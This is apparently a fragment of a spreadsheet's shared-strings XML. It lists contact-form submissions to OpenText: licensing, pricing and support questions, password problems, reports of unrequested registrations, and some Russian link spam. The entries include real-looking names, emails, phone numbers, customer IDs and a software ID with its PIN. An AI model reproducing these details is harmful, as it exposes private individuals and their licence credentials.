    <t>My old work laptop had a licensed Brava Desktop TX assigned to the MAC address. I got a new laptop recently and it has Brave Desktop TX but the license will not work. How do I reassign my old Brava license to my new work laptop? IT was supposed to have taken care of this issue but they are really busy and do not have time to investigate. I figured I'll try to find out and pass along the information to them so they can resolve this issue. -Thanks</t>
  </si>
  <si>
    <t>Regarding..for job opportunity</t>
  </si>
  <si>
    <t>SAP documents archive</t>
  </si>
  <si>
    <t>Price Estimate</t>
  </si>
  <si>
    <t>To understand OpenText Exstream and learn more about how it helps customer correspondence and create a sample to see whether it is feasible to apply it in my project</t>
  </si>
  <si>
    <t>Interested in a services quote to upgrade ApplicationXtender from 6.5 to 8.2.</t>
  </si>
  <si>
    <t>Bom dia!_x000D_
_x000D_
Gostaria de conversar sobre a solução de OCR para documentos oferecida pela Opentext._x000D_
Tenho uma equipe desenvolvendo um sistema para um cliente da área logística e precisamos digitalizar, reconhecer via OCR e validar documentos como CNH, CPF, CRLV e outros da área logistica. A idéia é integrar nosso sistema com uma solução via API._x000D_
_x000D_
Gostaria de receber um contato da área de negócios de SP e agendar uma conversa sobre nossas necessidades de projeto._x000D_
_x000D_
No aguardo,_x000D_
Obrigado.</t>
  </si>
  <si>
    <t>I raised a query last week with regards to eDocs v5.3.1. We are currently running this version but with plans to upgrade all clients to Windows 10 &amp; MS Office 2016, we would like to know if eDocs 5.3.1 is compatible? _x000D_
Many Thanks_x000D_
Kate</t>
  </si>
  <si>
    <t>EDI VAN Pricing</t>
  </si>
  <si>
    <t xml:space="preserve">Got lot's of mails to re-register and set a password, which does not work at all. _x000D_
Trying to enter my password just tells me it did fail to do so. No error details. </t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
I am Alfonso García from Capgemini Company._x000D_
I need download :_x000D_
xCP 1.6, 2.0, 2.1, 2.2, 2.3 and Content Server 7.2_x000D_
_x000D_
I still don’t have an account in Opentext._x000D_
_x000D_
I had account in EMC like alfonso-jose.garcia-banon@capgemini.com and I could download all about Documentum._x000D_
_x000D_
Now, where Can I download it?_x000D_
_x000D_
Please, can you help me?_x000D_
_x000D_
Best regards!_x000D_
</t>
  </si>
  <si>
    <t>Support Contract Or New Offer to upgrade the Fax system.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/Madame, _x000D_
_x000D_
My name is Fabio Milhoes. As I told you during our call, I am working for a procurement company, GEP Worldwide. Currently we are looking for agency/company, which would help our client manage content library (content factory librarian). Our client is a multinational pharmaceutical company based in Germany._x000D_
_x000D_
Based on the information available on your website, I believe that you could meet our requirements. Therefore, I would like to ask you for additional information needed. _x000D_
Can you please provide us with direct point of contact, because there will probably be RFI process launched for this project soon._x000D_
_x000D_
Your feedback would be appreciated by Wednesday 2017-Dec-13._x000D_
_x000D_
Thank you very much in advance for your participation._x000D_
Best regards,_x000D_
_x000D_
Fabio Milhoes_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I am an Employee of McAfee and takes care of VIM Support. I am looking for access to Knowledge base. As per the license one of the user should have access to VIM Knowledge base. It was with Peter Ngo earlier. He is no more part of organization. Please support. </t>
  </si>
  <si>
    <t>Comany should buy free DWG viewer license, inquire pirce and process</t>
  </si>
  <si>
    <t xml:space="preserve">BONANZA NEW YEAR OFFER!!!_x000D_
_x000D_
GET YOUR WEBSITE ON TOP OF GOOGLE AT VERY AFFORDABLE PRICE. GUARANTEED RESULTS or GET YOUR MONEY BACK*_x000D_
</t>
  </si>
  <si>
    <t>I would like to know the difference among Captiva Capture and Cpativa Advanced Recognition and other Captiva softwares. Please reply by email. Thank you.</t>
  </si>
  <si>
    <t>could not log in and could not reset new password</t>
  </si>
  <si>
    <t xml:space="preserve">We cannot obtain our Brava license key as your instruction. _x000D_
1. Cannot connect to your serialization web. _x000D_
2. Could you please give us a hand for getting IGCKey.lic  _x000D_
   Software ID: a036000000jkpiV   _x000D_
    Software pin: 402796 _x000D_
_x000D_
Thank you very much in advance for your kind assistance._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I would like a trial and pricing on right fax express</t>
  </si>
  <si>
    <t>guest test post _x000D_
[url=http://kioppoerk.com/]bbcode[/url] _x000D_
&lt;a href="http://kioppoerk.com/"&gt;html&lt;/a&gt; _x000D_
http://kioppoerk.com/ simple</t>
  </si>
  <si>
    <t xml:space="preserve">Explore Redact-It tool. </t>
  </si>
  <si>
    <t xml:space="preserve">We already have a contract in place with you but our sales rep is no longer valid, we are looking for someone else to help us. </t>
  </si>
  <si>
    <t>Cannot get a login, nor reset password, please help</t>
  </si>
  <si>
    <t>Qfiniti Server not recording and I need Open text support in the morning.  ID=IBM(51899) End user Code=EU0310069</t>
  </si>
  <si>
    <t>I get the registration confirmation email and click the link in the email. Log in. Then I get the page with no access and "Our record indicate that you have registered for access to My Support but have not yet confirmed your email with us. Plkease click on the link below to complete the process". I did this multiple times last week and twice today. I get the confirmation email no problem - but I still have no access.</t>
  </si>
  <si>
    <t>Wanting to get a fax solution for Valeey Heart Associates.</t>
  </si>
  <si>
    <t>В известный во всём мире праздник «День Святого Валентина» влюблённые обмениваются фигурными открытками в виде сердечка, дарят друг другу конфеты, игрушки или другие подарки, которые подчеркивают символичность их любви и верности…, подробнее читайте на сайте [url=http://fi-hi.ru]fi-hi.ru[/url]</t>
  </si>
  <si>
    <t>Hi, _x000D_
We are interested in the following courses: _x000D_
1-0101 Open Text Content Server Knowledge Fundamentals; and_x000D_
2-0120 Open Text Records Management 10.5._x000D_
_x000D_
For 5 employees within our department. We are wondering if it would be possible to have a private session on-site in Ottawa, Ontario, that could result in cost savings rather than 5 individual employee training fee? _x000D_
_x000D_
 Regards, _x000D_
_x000D_
Melanie Vezina</t>
  </si>
  <si>
    <t>Hi, I was just wondering if you will have something ready for me today? We are going to meet with the client tomorrow and would like to provide them with some numbers. Not trying to be pushy just getting a lot of pressure myself. _x000D_
_x000D_
I am looking at moving a customers email archive data from Bloomberg archive to Office 365. I am interested in a partner who can do this. The customer has around a 1.8 TB archive. I would like to know if this is something that you can do, what the process looks like, time to export and ingest the archive, and total cost? Please contact me at tyannuzzi@getnerdio.com</t>
  </si>
  <si>
    <t>Hello: please be advised that the New Mexico Judiciary has posted a Request for Information around Redaction software. Please see the ‘WHAT’S NEW’ on first page of nmcourts.gov</t>
  </si>
  <si>
    <t>Some days ago I've been receiving messages from you about Registration Confirmation on your site but really I haven't registered on your site. Probably, someone is attempting to create an account using my personal information data. Please, can you verify that it's true?</t>
  </si>
  <si>
    <t>I am looking for a point of contact with your company that can assist with the closeout of subcontract #4400112786 that we have with Open Text Corporation. I have documents to send over that will need to be completed and returned in order to finalize the closeout. Please let me know if you need additional information. I appreciate any assistance that can be provided. Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello: please be advised that the New Mexico Judiciary has posted a Request for Information around Redaction software. Please see the posting located at the below URL. Thank you._x000D_
https://nmcourts.gov/request-for-proposals.aspx_x000D_
</t>
  </si>
  <si>
    <t>Customer needs a quote.  Please send me a note so I can send you the request for renewal of OPENTEXT</t>
  </si>
  <si>
    <t>Would like to send an employee to training class - 1-7600 OpenText Exstream Introduction to Design and Production. I do not see it currently scheduled? Are there schedules for 2018?</t>
  </si>
  <si>
    <t>Hello, our enterprise uses Open Test RightFax throughout the system. I am new to the IT department and I believe we have a support contract with you. Can you please look up our company and let me know if we have any type of support? I am having some issues with our RightFax server. Please let me know ASAP. Our company name is; "UPMC Pinnacle" formally known as "Pinnacle Health Systems".  Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, Open Text._x000D_
_x000D_
My name is Todd Pugh, and I'm the Executive Director of a British Columbia municipal agency called CivicInfo BC. (www.civicinfo.bc.ca)_x000D_
_x000D_
On April 12, we're working with a group of elected officials from cities around BC's lower mainland to host a "Smart Cities" showcase.  Something like a TED talk where interesting ideas and projects are showcased in short presentations.  This is our venue; which is a rather interesting and somewhat unique facility in downtown Vancouver:  https://www.sfu.ca/mecs/facilities/centre-for-dialogue/meeting-rooms/asiapacifichall.html_x000D_
_x000D_
One topic that we'd love to address at our forum: artificial intelligence (machine learning), and the possible applications for cities.  I'm quite certain that the Mayors, Councillors, and municipal staff at our April 12 event would be very interested in hearing about Magellan.  I admit that I'm intrigued myself - it looks like there's amazing potential in the product. The scalability is particularly interesting, because Magellan would seem to (possibly) be in reach of mid-size and even small municipalities. In these communities, I'm under the impression that your competitors may be pricing themselves out of the market._x000D_
_x000D_
Is there as speaker from Open Text who might be interested in coming out to present at our event?  I'd love to discuss when you have a moment._x000D_
_x000D_
Best regards,_x000D_
_x000D_
Todd Pugh_x000D_
Executive Director_x000D_
CivicInfo BC_x000D_
_x000D_
www.civicinfo.bc.ca_x000D_
_x000D_
#203 – 4475 Viewmont Avenue_x000D_
Victoria, BC  V8Z 6L8_x000D_
Ph: 250-383-4898 ext.101_x000D_
E: tpugh@civicinfo.bc.ca_x000D_
</t>
  </si>
  <si>
    <t>Boa tarde, sou da área de arquitetura corporativa do banco cooperativo Sicredi e estamos realizando um processo de Software Selection para uma ferramenta de Gestão de Ativos Digitais. Acreditamos que o OpenText possa se encaixar em nossas necessidades._x000D_
Neste processo a primeira etapa trata-se do preenchimento de algumas informações referente a empresa e alguns requisitos técnicos e funcionais._x000D_
Inicialmente gostaria de saber se vocês têm interesse em participar da seleção?_x000D_
Fico no aguardo de retorno para te encaminhar a planilha de requisitos._x000D_
_x000D_
Att.,_x000D_
_x000D_
Leonardo Fantinel_x000D_
Arquitetura Corporativa - Sicredi_x000D_
leonardo_fantinel@sicredi.com.br</t>
  </si>
  <si>
    <t xml:space="preserve">We're in the process of upgrading our Workstations from Windows 7 to Windows 10 and with that, we should also upgrade Exceed 2008 to the latest release of OpenText.. Unfortunately I could not find a download link for OpenText 15. Can you also tell me, how many license we have for that product. Thanks for your help, Markus </t>
  </si>
  <si>
    <t>Need to setup a demo and have some presales questions answered.</t>
  </si>
  <si>
    <t>Looking for new faxing soloutions</t>
  </si>
  <si>
    <t>I need information on how to download and install the latest OpenDeploy s/w for linux.  We are looking at changing platforms(currently windows) and I need to download the server s/w.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We are deploying Cisco UC solution and would like a demonstration of RightFax product as FoIP solution._x000D_
_x000D_
Thank you_x000D_
Vik</t>
  </si>
  <si>
    <t>Don't know why I keep receiving emails from you asking me to verify my account, I never requested one that I know of</t>
  </si>
  <si>
    <t>We would like to get more information about how to integrate our PIM with GSX. Can we have a call? Please advice how to proceed._x000D_
_x000D_
Thanks for your help_x000D_
Manesh</t>
  </si>
  <si>
    <t xml:space="preserve">We would like assistance in upgrading our Rightfax application.  If you can provide a resource to upgrade this application for us we would appreciate it.  It could be a resource at your organization or a vendor you recommend.  </t>
  </si>
  <si>
    <t>I think someone open an account with my email.</t>
  </si>
  <si>
    <t>We are a current OpenText customer using exceed on demand (license number V1140-47000 &amp; customer id EU0028376).  We are interested in speaking with someone from OpenText about moving to exceed turbox which would support PIV authentication.  We need to move to PIV authentication as part of a tech refresh project which we will be beginning early next year.  Thanks,  Steve Ferruzza   (I go by my middle name which isn't on my government id)...</t>
  </si>
  <si>
    <t>Need pricing for a fax solution for a company with 150 users with most of them being at the main corporate office and about 35 scattered at our outer offices.</t>
  </si>
  <si>
    <t>I did not sign up for anything related to your company and yet I've received over 10 emails stating I registered on this site.  I did not.  Please remove me from any databases or distribution lists related to your company.</t>
  </si>
  <si>
    <t>One of our Officers received several emails claiming to be confirmations of a new account.  She said she hadn't tried to sign up so I would like to investigate if possible.  I see two Company names come up on your form when emailing this, one for Pittsfield Charter with Pittsfield spelled wrong and another for Pittsfield Twp parks...  do we have accounts with you?  Are they associated with any employee names?  Can you see any requests for account made yesterday 12/10/2017 around 3:48 pm EST?  the email address used would have been menckt@pittsfield-mi.gov  I am not sure if it was a phishing email but the domain links in the message look legitimate.  Do you have any help to verify this?</t>
  </si>
  <si>
    <t>I am getting spammed from connect@opentext.com about some registration confirmation to access "Online Support Resources." Please confirm and take me off your list. Thanks.</t>
  </si>
  <si>
    <t>In the old fax2mail, I could take a group of users and move them to another group.  How do I complete this activity in the new system?  I looked in help and cannot find a way.  Can I get to the old portal to complete a clean up please?  Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">We need documentation on Report Builder 6.0 so we can modify existing reports.  Do you have user guide.  Per Amtech Software we should be able to get this (see below):_x000D_
From: Sue Hahn [mailto:shahn@futuraservices.net] _x000D_
Sent: Monday, December 11, 2017 10:12 AM_x000D_
To: Jennifer Lindaman &lt;JLindaman@bcipkg.com&gt;_x000D_
Subject: FW: Gupta Report Builder Documentation_x000D_
_x000D_
Glenn is not able to find anything – but your registration gives you access to the support folks at Open Text who have purchased this from Gupta._x000D_
_x000D_
https://www.opentext.com/what-we-do/products/specialty-technologies/opentext-gupta-development-tools-databases/opentext-gupta-report-builder_x000D_
_x000D_
From: Glenn Poynor _x000D_
Sent: Monday, December 11, 2017 11:10 AM_x000D_
To: Sue Hahn &lt;shahn@futuraservices.net&gt;_x000D_
Subject: RE: Gupta Report Builder Documentation_x000D_
_x000D_
I did not find anything – they may want to contact Open Text to see if they have anything_x000D_
_x000D_
 _x000D_
Glenn Poynor_x000D_
Development Manager_x000D_
Amtech Software_x000D_
gpoynor@amtechsoftware.com_x000D_
 _x000D_
Office: (215) 639-9540  ext. 1218_x000D_
</t>
  </si>
  <si>
    <t>have clients with needs for Fax Server options, one school district needs this asap, sold rightfax previously for my previous company, please contact me asap, thanks</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to learn more about Open Text and how it can take us from a paper based A/P environment to paperless.  I'd like to learn about your paperless invoice processing, OCR, workflow, etc.  Thanks.  </t>
  </si>
  <si>
    <t>Exploring brava open text for pdf comparison reporting</t>
  </si>
  <si>
    <t>I received an email to update my password but when I try the update fails</t>
  </si>
  <si>
    <t>I have attempted three times to submit my information for a free "Open text for dummies" book but a pop up ask for industry- there is no field for industry?  I can not move forward please help!  thank you.</t>
  </si>
  <si>
    <t>I would like to move from open source BIRT to your product. We have written an ODA that we would require in your iHub product and designer.</t>
  </si>
  <si>
    <t>I am SAP employee and wishing to access "Support" area to download OpenText DAM and roadmap document. I learnt all SAP employees should be allowed to access this area. Could you grant me access to that area?</t>
  </si>
  <si>
    <t xml:space="preserve">Interested in a Live Link Demo </t>
  </si>
  <si>
    <t>I need a contact/ sales rep for the product Easy Link. We do not have any on record and we are trying to pay the invoice we have recieved.</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
_x000D_
die start:bausparkasse hat ein Open Text Problem, welches wir als Ticket (OTCS Ticket 3338019 : Aufruf des Management Servers) über die Fa. Cyberhouse (Partner der start:bausparkasse, welcher 2012 das BeraterService für die start:bausparkasse entwickelt hat) an Open Text weitergeleitet haben. Von Open Text haben wir bei der Ticketbearbeitung folgende Information bekommen :_x000D_
_x000D_
After speaking with my colleagues,  the developers, they told me you are managing a too old application version and so they deeply suggest to upgrade to the 11.2.1 at least, if you can’t upgrade to a latest version (16 sp2)_x000D_
That is because there were a bug fixed for a issue similar to yours that can likely fix it.      -       Paolo Bergomi_x000D_
_x000D_
Meine Fragen an Sie lauten :_x000D_
_x000D_
•	können Sie uns beim Upgrade von Management und Delivery Server unterstützen?_x000D_
•	Falls ja, in welchem Zeithorizont wäre das möglich bzw. welche Kosten entstehen für die start:bausparkasse?_x000D_
_x000D_
Bitte um Rückmeldung._x000D_
_x000D_
Danke und mit freundlichen Grüßen_x000D_
Franz Hübl_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
 _x000D_
Hello,_x000D_
_x000D_
Greetings from Webgrity!_x000D_
 _x000D_
To showcase our skills to you, we are offering one time FREE TRIAL program for custom homepage layouts. We will offer you 3 unique homepage layout concepts for any web project at NO cost. We will charge you $110 only if you finalize the project with us. You will not pay anything if you don’t finalize the project for any reason. We will be happy if you would like to know more about this offer. Just write to us and we will be sending details of the offer._x000D_
 _x000D_
We are located in India and would like to be a part of your BACK END SUPPORT TEAM for Web Design and Development. You may check our website at http://www.webgritytalk.com/_x000D_
 _x000D_
We give unlimited revisions and lifetime warranty on all projects until you are 100% satisfied._x000D_
_x000D_
_x000D_
Regards,_x000D_
Elisa Weber_x000D_
Business Development Manager_x000D_
Webgrity_x000D_
</t>
  </si>
  <si>
    <t>Hi_x000D_
I would like to get in touch with someone who can answer questions regarding creating and editing email templates and how one would do it. _x000D_
Best regards and merry Christmas!_x000D_
/_x000D_
Lo</t>
  </si>
  <si>
    <t>We currently have a number of license for Doc Server Pro Edition Search which we bough a couple years ago. We have now been asked to purchase another license for an additional user. Please can you provide a quote for 1 additional user and confirm if we downgrade to ensure they all using the same version._x000D_
regards</t>
  </si>
  <si>
    <t>Hi,_x000D_
    I need some information on the current support position of your OpenText Metastorm product. Can someone please contact me via eMail ASAP.._x000D_
_x000D_
_x000D_
All the best_x000D_
Gurdav Singh</t>
  </si>
  <si>
    <t>Invitation to placement drive-please connect to HR</t>
  </si>
  <si>
    <t>Nach dem Update von Windows 10 auf Creators 1703 kann der Open Text Imaging Windows Viewer nicht mehr als Plug-in geöffnet werden._x000D_
_x000D_
Das jeweilige zu öffnende Dokument wird im OpenText Imaging Windows Viewer als eigenes Fenster geöffnet und der User wird über ein altmodisches Download-Fenster zum Öffnen oder Speichern aufgefordert._x000D_
_x000D_
Bitte um Bekanntgabe einer Lösung zu diesem Verhalten.</t>
  </si>
  <si>
    <t>Demo download &amp; RFQ</t>
  </si>
  <si>
    <t>I don't seem to be able to login to the Support Portal for Documentum.  I previously had an EMC support account.  Are you able to advise as to how I can get access?  Should I be using my old EMC account credentials or do I need to register for a new account?</t>
  </si>
  <si>
    <t>On Friday the 8th of December I received 3 x Registration Confirmation emails from OpenText that were not initiated by me. Email sent to address: alan.ryman@thinkanalytics.com.  Please can ensure that no such account has been created and please remove me from all communication lists?_x000D_
_x000D_
Best Regards,_x000D_
_x000D_
Mr Alan Ryman</t>
  </si>
  <si>
    <t>I would like to explore Analytics partnership avenues in airport domain...</t>
  </si>
  <si>
    <t>Привет всем участникам! Класный у вас сайт _x000D_
Нашел прикольные сервера кс 1 6 зомби мод http://serveracs16.net/ : _x000D_
[url=http://serveracs16.net/game/cs] Сервера кс 1.6 [/url] _x000D_
[b] скачать кс го бесплатно с серверами [/b] http://serveracs16.net/game/csgo _x000D_
[url=http://serveracs16.net/game/source] сервера css v34 no steam [/url] _x000D_
И тут нашёл много интересных новостей про игры и сервера: _x000D_
http://serveracs16.net/server_info/78.46.75.230:64181/</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Can you confirm if the OpenText application can be used to synchronise individual SharePoint list items across different site collections ?  I am fully ware OpenText can do everything to do with physical records, but in this case we are not talking about physical records, instead individual list items within a SharePoint list_x000D_
_x000D_
Thanks in advance_x000D_
_x000D_
Rick_x000D_
</t>
  </si>
  <si>
    <t>I would like to find out from Opentext on why was my support account revoked, since I was able to access this last week to login and create support ticket?</t>
  </si>
  <si>
    <t>Hello,_x000D_
For some reason during this night my email was used to create an account on your website. I received like 7 emails during this night. I was sleeping so i can't be the one to have done that at 5:41 am (Paris timeline). _x000D_
Is there any way to confirm the location from which those requests were done?_x000D_
I already change my account password, but i want to make sure no operation where done with it._x000D_
Thank you for your time._x000D_
I'm mostly available on mails._x000D_
Matthieu_x000D_
Thank you.</t>
  </si>
  <si>
    <t>Upgrade from Documentum 6.7SP2 to 7.3. Modules include Records (including Physical Records), My Documentum for Desktop, Content Transformation Services, Content Intelligence Services, and Records Queue Management._x000D_
Initial meetings will require Teleconference with Europe, most convenient time is 6pm (AUS) onwards.</t>
  </si>
  <si>
    <t>Привет всем участникам форума! класный у вас сайт! _x000D_
Нашел интересную базу кино:  [b] комедии 2017 список лучших [/b] [url=http://kinorulez.ru/]http://kinorulez.ru/[/url] _x000D_
Здесь: http://kinorulez.ru/news/918-kanal-fox-anonsiroval-tri-komediynyh-seriala.html [b] Канал Fox анонсировал три комедийных сериала [/b] _x000D_
Тут: [url=http://kinorulez.ru/news/12938-hbo-nazval-uchastnikov-prezentacii-igry-prestolov-na-comic-con-2017.html] HBO назвал участников презентации "Игры престолов" на Comic-Con 2017 [/url] _x000D_
Здесь: http://kinorulez.ru/triller/8787-angel-ili-demon-sezon-1-2013.html _x000D_
http://kinorulez.ru/istoricheskiy/ [b] Лучшие исторические фильмы 2017 в хорошем качестве [/b] _x000D_
[url=http://kinorulez.ru/triller/] 2017 смотреть лучшие триллеры [/url] _x000D_
[url=http://kinorulez.ru/melodrama/] 2017 в хорошем качестве лучшие мелодрамы [/url] 2017 в хорошем качестве лучшие мелодрамы</t>
  </si>
  <si>
    <t>Привет всем участникам!  Класный у вас сайт _x000D_
Нашел прикольные сервера кс на этом сайте: http://cs-servers-monitoring.ru/ : _x000D_
[url=http://cs-servers-monitoring.ru/game/cs] топ сервера кс 1 6 [/url] _x000D_
[url=http://cs-servers-monitoring.ru/game/csgo] сервера майнкрафт 1 8 с кс го [/url] _x000D_
[b] хостинг игровых серверов css v34 [/b] http://cs-servers-monitoring.ru/game/source _x000D_
[b] какой сервер нужен для minecraft [/b] http://cs-servers-monitoring.ru/game/minecraft _x000D_
И тут нашёл много интересных новостей про игры и сервера: _x000D_
http://cs-servers-monitoring.ru/news/227-voskresnyy-strim-portal-2-dve-golovy-luchshe.html</t>
  </si>
  <si>
    <t>Interested in Documentum - Can someone in sales call me please on Monday?</t>
  </si>
  <si>
    <t>Dear OpenText,_x000D_
_x000D_
I have read about the product suite Enterprise Content Management and it looks like it answers my needs._x000D_
Is there an option to do a POC or have a trial edition to test it in my company?_x000D_
_x000D_
Best Regards,_x000D_
Ben Shai</t>
  </si>
  <si>
    <t>I need to transfer my Brava desktop to a new computer.</t>
  </si>
  <si>
    <t>I have received emails ref a new account against my email. I have not requested this. please delete any accounts against my email</t>
  </si>
  <si>
    <t xml:space="preserve">this morning we have seen "Registration Confirmation" messages from opentext in our email overflow (the email addresses are quite old and lo longer valid), so it's clear that something odd is going on - the email addresses are JSachs@infinitrac.com and JMiles@infinitrac.com - </t>
  </si>
  <si>
    <t>free trial for remote desktop access</t>
  </si>
  <si>
    <t>Interested in engaging your professional services organization in assisting with stabilizing our eDocs implementation.</t>
  </si>
  <si>
    <t>janitorial services at Tinton Falls, NJ</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, it is related to Alchemy Database._x000D_
_x000D_
Actually, we have outsourced document management to 3rd party since year 2010 who is using Alchemy Database. This year, we decided to change the vendor where the new one is not using Alchemy.  The old vendor has given us the CD with Alchemy Database since 2010 which size is around 120 GB.  Also, the old vendor is telling us that we can use the Alchemy Client which requires no license.  I would like to double check with you.  Could we really use the Alchemy Client without any licenses?  Thanks._x000D_
_x000D_
Moreover, do you offer any services to export Alchemy Database to PDF files?_x000D_
_x000D_
Thanks._x000D_
</t>
  </si>
  <si>
    <t>Interested in a summary sheet of features and cost</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
_x000D_
Product(s) and/or service(s) includes but not limited to ETL, CTF, OLAP SQL SERVER AND OTHER DATA MINING TECHNOLOGIES._x000D_
Do you have a List or know good sources of IOT ENGINES such as: processor(s) or ETL Tool(s) (including but not limited to XML&amp;SCHEMA PROCESSOR ENGINE) to extract or mine or scrap click-stream or internet or online or web data source and load to destination database engine {with search tool(s)}._x000D_
OLAP (Online Analytic Processing) SQL Server with query performance and analytic richness including data-mining technologies._x000D_
SEARCH-INTERFACE- that could data-mine the internet/web._x000D_
If you don’t mind do you have or know a good source for:_x000D_
CUSTOM INTERNET OR WEB PROJECT OR PROGRAM PURPOSE AND TOOL_x000D_
PURPOSE: Research or search or crawl all over the internet or web or online._x000D_
TOOL: Spider or Crawler or User-agent as a product._x000D_
PURPOSE: Connectivity or connection or connectors or integration or integrators._x000D_
PURPOSE: Create or build, develop or implement a database._x000D_
TOOL: Rapid application development, Implementer, Data query or select or search or sort.  _x000D_
 _x000D_
Native Drivers (Compact 2013) 3/26/2014. Native drivers are drivers that expose any API set other than the stream interface functions. Unlike stream drivers, each native driver implements a specific function according to its purpose._x000D_
_x000D_
·         Connection: Establishes a connection to a specific data source_x000D_
_x000D_
·         Command: Executes a command against a data source_x000D_
_x000D_
·         DataReader: Reads a stream of data from a data source_x000D_
_x000D_
·         DataAdapter: Populates a data set and resolves updates with the data source_x000D_
_x000D_
DATA CRAWLING OR EXTRACTION OR SCRAPING FROM THE INTERNET OR WEB OR ONLINE AND CONNECTION OR INTEGRATION TO THE DATABASE_x000D_
_x000D_
·         Internet or Web or Online (HTTP)_x000D_
_x000D_
·         Connection: Establishes a connection to a specific data source (internet or web or online)_x000D_
_x000D_
·         Command: Executes a command against a data source_x000D_
_x000D_
·         DataAdapter: Populates a d</t>
  </si>
  <si>
    <t xml:space="preserve">At Lexipol, we are comparing CSP/ECM vendors for our collaborative content management needs (current and planned). I have defined a specific set of features that I am evaluating against and I would like to be put in touch with a technical point of contact who can help me map OpenText offerings to each of the features I've detailed and to help ensure I adequately understand OpenText offerings without spending too much time diving deep into the documentation. (email correspondence is best since I can add others to the conversation via cc: as needed). My timeline is to have completed evaluation and submit a purchase recommendation to executives by 12/22 (before end of year holidays). - Ben </t>
  </si>
  <si>
    <t>I am needing to get some pricing for multiple licenses for Brava Reader. We have been using the free download version and would like to look at the option of buying. Please send me the pricing for a license for 20 users.</t>
  </si>
  <si>
    <t>I am developing a tool as part of creative activity day for our company and I would like to download a trial version of Blazon so I my GUI can interface with the transformation services of Blazon and convert files of various formats to various output formats (separated from Brava).  Do you have the link that I need to do the trial version download for Windows 10?  Thanks....</t>
  </si>
  <si>
    <t>What is the price for a development kit for Accell/SQL on Red Hat Enterprise Linux 7?</t>
  </si>
  <si>
    <t>Access to knowledge base.</t>
  </si>
  <si>
    <t>Good day,_x000D_
_x000D_
I just received a "confirmation requests" from you guys._x000D_
Never registered anywhere._x000D_
_x000D_
Can't find a working "pishing / spam ..." e-mail on your website or support area_x000D_
so I'm going to copy the e-mail and code here._x000D_
_x000D_
Thanks_x000D_
Andy_x000D_
_x000D_
Delivered-To: andy@add-color.com_x000D_
Received: by 10.28.218.10 with SMTP id r10csp1089102wmg;_x000D_
        Fri, 8 Dec 2017 11:50:05 -0800 (PST)_x000D_
X-Google-Smtp-Source: AGs4zMZQegtXSuSjOD9XatAmeBu7X2MDIt797RlT7HIaMOjCckSLdIa50GXgzu6zZswu0F+6BM5+_x000D_
X-Received: by 10.36.131.200 with SMTP id d191mr7588424ite.97.1512762605860;_x000D_
        Fri, 08 Dec 2017 11:50:05 -0800 (PST)_x000D_
ARC-Seal: i=1; a=rsa-sha256; t=1512762605; cv=none;_x000D_
        d=google.com; s=arc-20160816;_x000D_
        b=yL7XoArEHxJ++IpurUKVBtp0M3grsKcKEMmp/p6jSxcSmXD7c9myEOr/9aBeOxhXgt_x000D_
         KcmyLCtZZMbMi6Y+sHI/ZDyz8tL1vGEiKn5Vy42jhXWM/tXCpykZdl2yaCUekqKNWJhR_x000D_
         WPcOovwBxLD09Vw6paS0Z4NYFzhW79UOShS+zO2z3Q5w4nId1niXh6BSqZPP9+2aALWb_x000D_
         27xErFstv5Gz+oNNXRvIHOVka3gJGiPk6Ppt9dZxfbFUYyQWb+NzvMdrL2OKsIAgiHX/_x000D_
         aKmLW0XwVTThIeHjMTuFS6I2pt+LSsp7z/3Zbl77ludgMYDrjU+8s7hwK5bKUFh7Q5yu_x000D_
         Ul/Q==_x000D_
ARC-Message-Signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=google.com; s=arc-20160816;_x000D_
        h=message-id:content-transfer-encoding:subject:date:to:from_x000D_
         :mime-version:arc-authentication-results;_x000D_
        bh=06mxHyirR7LKzvV9j8yLVo41er0cLUpLznQKUhAjlKM=;_x000D_
        b=fGwa9Sb1gxMnXU7WRqSVtJaa4SqUJD27Dfcd/mpQpxNvyEUW0VzPS9WhCUTYLXHc1w_x000D_
         CsNcy8MGs8dtY0Eup8en7fa+pWy3CF3ZRtFH0ITQWl3q2yAP4am1YIQjxz05aa85q5Eo_x000D_
         F1QeQGOdLb4hS3G8attx9KjwtUt5MhNS5mtQ/BOkn033aGuTBZ/YvL48MeRU4ED4ju+/_x000D_
         GT+MNkLK+ATZcvHdNog7g9ouugilqb/MxC5ek6hZ/nzuqEjuk0FjX5GmhymBG9S/mbVn_x000D_
         wpl6H1547Y5IRji6V8ptFwr829OfhdsbGYQzd8UlxYc3g1KiSoSbtPsS7jNK3ulHPnVi_x000D_
         esOg==_x000D_
ARC-Authentication-Results: i=1; mx.google.com;_x000D_
       spf=pass (google.com: domain of connect@opentext.com designates 205.211.178.42 as permitted sender) smtp.mailfrom=connect@opentext.com;_x000D_
       dma</t>
  </si>
  <si>
    <t>I want to subscribe to your onDemand learning. But, need to see a list of the available courses to make sure it has what I'm looking for. Regards, Sohrab Ghaffari</t>
  </si>
  <si>
    <t>To learn very hard and opportunity for the job</t>
  </si>
  <si>
    <t>Looking for cost of live link software.</t>
  </si>
  <si>
    <t>Hello, I am trying to find out the software end  of support date for Rightfax Print Processor 9.4.0, Rightfax Product Suite 9.4.0 and Rightfax Product Suite 10.6.3.1179. Thanks.</t>
  </si>
  <si>
    <t>I am looking at moving a customers email archive data from Bloomberg archive to Office 365. I am interested in a partner who can do this. The customer has around a 1.8 TB archive. I would like to know if this is something that you can do, what the process looks like, time to export and ingest the archive, and total cost? Please contact me at tyannuzzi@getnerdio.com</t>
  </si>
  <si>
    <t>Looking for pricing information for my client - a dept. of the Nova Scotia government.</t>
  </si>
  <si>
    <t>Would like to evaluate Extream compared to Quadient Inspire.  Could we get an evaluation copy?</t>
  </si>
  <si>
